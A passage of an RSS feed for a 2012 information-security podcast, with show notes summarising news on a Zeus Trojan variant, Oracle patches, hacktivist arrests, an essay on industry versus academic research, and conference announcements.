<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.scmagazineuk.com/new-variant-of-zeus-targets-logins-for-cloud-based-systems/article/236170/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.scmagazineuk.com/new-variant-of-zeus-targets-logins-for-cloud-based-systems/article/236170/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A new variation of the Zeus banking Trojan has been detected, targeting users of cloud-based billing companies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers at Trusteer said that the new variant of the data-stealing malware affects customers of cloud billing service providers such as Ceridian, a Canadian human resources and payroll firm.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trusteer&#39;s Amit Klein said: &ldquo;These attacks are designed to route funds to criminals, and bypass industrial-strength security controls maintained by larger businesses. In the attack on Ceridian, Zeus captures a screenshot of a Ceridian payroll services web page when a corporate user (whose machine is infected with the Trojan) visits this website. This allows Zeus to steal the user ID, password, company number and the icon selected by the user for the image-based authentication system.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It claimed that this type of attack saw the Metropolitan Entertainment &amp; Convention Authority lose $217,000 last year after an employee was targeted by a phishing email and infected with malware that stole access credentials to the organisation&#39;s payroll system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trusteer said this would become more prevalent because targeting enterprise payroll systems allows an attacker to gain more money than from a person; this would also not raise many red flags as valid login credentials are used and, by targeting a cloud service provider, the enterprise customers who use the service have no control over the vendor&#39;s IT systems and thus little ability to protect their backend financial assets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It also said that cloud services can be accessed using unmanaged devices that are typically less secure and more vulnerable to infection by financial malware, such us Zeus.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://cgi.cs.indiana.edu/%7Enhusted/dokuwiki/doku.php?id=research:industryvsacademia"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://cgi.cs.indiana.edu/~nhusted/dokuwiki/doku.php?id=research:industryvsacademia</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Twitter discussion one evening made me start pondering the differences between research in the Security Industry and in Security Academia. When I refer to Industry, I&#39;m not referring to the R&amp;D communities that are bringing in DARPA/DHS cash or Microsoft Research but I am referring to the organizations that are performing malware research, independent platform research, and vulnerability research. While I&#39;m not always clear on what the general profit generating activities are, I assume the research that is &ldquo;published&rdquo; (posted on a Blog, a company white paper, or released to a threat monitoring website) is a byproduct of day-to-day consulting jobs the corporation gets. Perhaps the research is used as a PR mechanism by employees/managers at the various organizations. A great example of this is the blogs released by F-Secure. Many times the blogs contain some meaty information regarding the virus analysis they&#39;ve been performing on some new found piece of malware. The information that&#39;s published is not only good publicity (&ldquo;Look at how smart our employees are!&rdquo;) but also is firmly part of the general workflow of the business(&ldquo;This didn&#39;t cost us a thing to produce!&rdquo;). They&#39;re, in fact, getting it for free. I think this sums up a vast majority of the research that&#39;s done by most firms.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Academic research tends to be a different beast entirely. Most academic research stems from an idea, and not necessarily from a business work flow. When I refer to academic research I&#39;m talking about what goes on at most universities and non-profit R&amp;D firms. For-profit R&amp;D firms tend to be product driven (most research that comes out of Google is going to, in some way, be about increasing their ad revenue, directly or indirectly). The basic idea is not necessarily feasible, nor should be it. A great example is the stuff cryptographers come out with all the time. They can define their constructions right there in the paper even though if those constructions were implemented the scheme would run slow as molasses. 20 years down the road we&#39;ll finally be able to implement them (Garbled Circuits are a great example). This also allows academics to do some pretty crazy things to see if they&#39;ll work. For example, if we develop an antivirus program that works like a human immune system, how well does it work? This sort of new idea is pretty risky for a traditional AV company who has a tried and true method based on pattern matching. Academia is a great place for this to happen because there is no profit margin, the idea doesn&#39;t have to be viable. Also, Academia can sometimes come up with some new technologies for the security field. Academia, and research labs, also create multidisciplinary environments that will NEVER show up in the security industry and that sort of collaboration leads to really cool discoveries (Bell Labs anyone? They created the packet filtering firewall.).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So now we have these two different research methodologies. On one hand we have the sexy vulnerability research by various companies that use metasploit on a day-to-day basis. On the other hand we have this not-so-sexy (except for Sheldon from the Big Bang Theory) research coming out of Academia. Both end up serving their purposes VERY well and neither is &ldquo;better&rdquo; than the other. However, because industry research is far more digestible by the security media, it tends to get reported on, which leads to the authors being seen as really cool, which tends to lead to aspiring young minds to mimic their heroes. This leads security researchers in Academia to do Really Dumb Things (RDTs). I&#39;ve personally seen RDTs happen quite often in the Android research. The security industry is doing its thing pointing out the basic flaws in the system as it was implemented because this is what they&#39;re coming across during their jobs. That&#39;s great. It&#39;s a valuable service! The problem is academia starts doing this. We see papers analyzing vulnerabilities in manufacturer systems that amount to the developers working for company A not following Google&#39;s secure coding guidelines. Really? People don&#39;t read secure coding guidelines? People don&#39;t follow them? You&#39;re kidding me! I don&#39;t believe it! If you couldn&#39;t tell from the sarcasm, this is </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NOT </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">what academia should be doing, it is a RDT. You know who should be doing that sort of research? Companies like Cigital because that&#39;s what they get paid to do! Academia should be out there saying, &ldquo;Based on this research by Cigital, we propose this new feature X in the operating system to prevent vulnerability Y from happening.&rdquo; Other non-RDT academic research includes doing some interesting user design analysis (&ldquo;Hmm, is this really the best way to convey permissions and risk to users who download apps?&rdquo;), economic analysis (&ldquo;We can say at 95% confidence interval malware authors are making $XXXXX from their malware&rdquo;), and interesting new threats (&ldquo;If we put mobile phones in a botnet they can physically track folks NOT in the botnet!&rdquo;).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcworld.com/businesscenter/article/253673/oracle_to_issue_88_security_patches.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcworld.com/businesscenter/article/253673/oracle_to_issue_88_security_patches.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From the &ldquo;are you shitting me&rdquo; files: &nbsp;Oracle is planning to release </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">88</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> patches on Tuesday, covering vulnerabilities affecting a wide array of its products, according to a pre-release announcement</span><a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted to its website</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tuesday&#39;s scheduled patch release is larger than Oracle&#39;s last quarterly critical patch update in January, when it released 78 fixes.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The upcoming patch batch includes six fixes for Oracle&#39;s database, three of which can be exploited remotely without a username and password. The highest CVSS (Common Vulnerability Scoring System) base score for the database bugs is 9.0 on the system&#39;s 10-point scale.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another 11 patches cover Oracle Fusion Middleware, with nine being remotely exploitable without authentication. Within this group, the highest CVSS base score is 10 for Oracle JRockit. Other affected products include BI Publisher and JDeveloper. &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The patch release also includes six bug-fixes for Oracle Enterprise Manager Grid Control; four for the E-Business Suite ERP (enterprise resource planning) application; five for Oracle&#39;s Supply Chain Suite; 15 for various PeopleSoft Enterprise applications; 17 for Oracle Financial Services software; two for Oracle Industry Applications; and one for Oracle Primavera.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/TeaMp0isoN-Members-Arrested-Hackers-Deny-264435.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/TeaMp0isoN-Members-Arrested-Hackers-Deny-264435.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to</span><a href="http://www.guardian.co.uk/uk/2012/apr/12/met-police-anti-terrorism-hotline?CMP=twt_gu"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> The Guardian</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, a couple of teenagers, aged 16 and 17, have been arrested by UK authorities, being suspected of intercepting and leaking the phone call from the MI6 anti-terrorist hotline. However, members of TeaMp0isoN, the hacktivist collective that&rsquo;s behind the stunt, deny the whole thing.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suspects were apprehended somewhere in the West Midlands by representatives of the Metropolitan Police&rsquo;s Central e-Crime Unit (PCeU). They are currently held in custody and accused of violating the Malicious Communications Act and the Computer Misuse Act.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This just comes to prove on how you shouldn&#39;t believe everything you read online. Tsk tsk tsk&#8230; NOBODY in #TeaMp0isoN has been arrested,&rdquo; tweeted</span><a href="https://twitter.com/#%21/_f0rsaken"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> F0rsaken</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, one of the members of the group.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;TriCk was online and well with communication when this article was written. He is not arrested,&rdquo; he explained.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Scotland Yard hasn&rsquo;t issued an official statement to confirm the arrests, but we&rsquo;ll soon find out if the apprehended individuals are in fact members of the TeaMp0isoN hacktivist collective.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In an interview we&rsquo;ve recently had with TriCk, he was pretty certain that authorities have nothing on him.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;100% certain they have nothing on me. I don&rsquo;t exist to them, I&rsquo;ve never used my real details online, I&rsquo;ve never purchased anything. My real identity dosen&rsquo;t exist online. &#8211; and no I don&rsquo;t fear getting caught,&rdquo; he said at the time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-645-google-bbs-cell-phone-pron-opdefense-zeus-targeting-cloud-industry-vs-academia-are-you-shitting-and-teamp0ison-arrest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3767/0/infosec-daily-podcast-episode-645.mp3" length="61833595" type="audio/mpeg" />
		<itunes:duration>0:42:55</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 645 for April 13, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 645 for April 13, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: www.masswerk.at/googleBBS/
This is more a funny site than a story. This site shows us all how Google would have been in the 80s, the BBS days, before Karthik was born.







Welcome back, ANONYMOUS. Today it is Friday 13 April 2012! &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;‖ 




‖ &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;‖ 




‖ &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;,, &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;‖ 




‖ &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;.g8&#34;&#34;&#34;bgd &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;`7MM &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;‖ 




‖ &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;.dP&#180; &#160;&#160;&#160;&#160;`M &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;MM &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 644 &#8211; Wicd Flaw, ProCurve Malware, CabinCr3w Arrest, TriCk MI6 Phone Hack, Flashback Decrease, Goldman Sachs Source Code, and Nordstrom Hackers</title>
		<link>http://www.isdpodcast.com/episode-644-wicd-flaw-procurve-malware-cabincr3w-arrest-trick-mi6-phone-hack-flashback-decrease-goldman-sachs-source-code-and-nordstrom-hackers</link>
		<comments>http://www.isdpodcast.com/episode-644-wicd-flaw-procurve-malware-cabincr3w-arrest-trick-mi6-phone-hack-flashback-decrease-goldman-sachs-source-code-and-nordstrom-hackers#comments</comments>
		<pubDate>Fri, 13 Apr 2012 01:00:40 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3762</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 644 for April 12, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 644 for April 12, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
